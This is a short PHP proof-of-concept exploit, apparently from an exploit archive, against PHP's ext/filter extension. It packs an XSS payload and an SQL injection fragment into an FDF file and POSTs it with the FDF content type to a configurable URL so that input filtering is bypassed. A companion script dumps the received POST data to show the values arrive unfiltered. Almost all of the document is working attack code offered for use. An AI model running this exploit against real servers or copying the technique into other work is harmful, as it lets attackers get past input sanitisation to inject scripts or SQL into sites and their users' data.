//////////////////////////////////////////////////////////////////////// // PHP ext/filtet FDF POST Filter Bybass Exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // _POST is the array that will be sent to the url in $url $_POST = array(); $_POST['var1'] = "<script>alert(/XSS/);</script>"; $_POST['var2'] = " ' UNION SELECT "; $url = "http://127.0.0.1/info.php"; // You do not need to change anything below this $outfdf = fdf_create(); foreach ($_POST as $key => $value) { fdf_set_value($outfdf, $key, $value, 0); } fdf_save($outfdf, "outtest.fdf"); fdf_close($outfdf); $ret = file_get_contents("outtest.fdf"); unlink("outtest.fdf"); $params = array('http' => array('method' => 'POST', 'content' => $ret, 'header' => 'Content-Type: application/vnd.fdf')); $ctx = stream_context_create($params); $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { die("Cannot open {$url}"); } $response = @stream_get_contents($fp); echo $response; echo "\n"; ?>
<?php ob_start(); var_dump($_POST); $content = ob_get_contents(); error_log($content); ob_end_clean(); print $content; die; // ouput an empty FPF file $outfdf = fdf_create(); $tmpname = tempnam('../temp', "FDF_"); fdf_set_status($outfdf, "Thank you!"); fdf_save($outfdf, $tmpname); fdf_close($outfdf); fdf_header(); $fp = fopen($tmpname, "r"); fpassthru($fp); unlink($tmpname);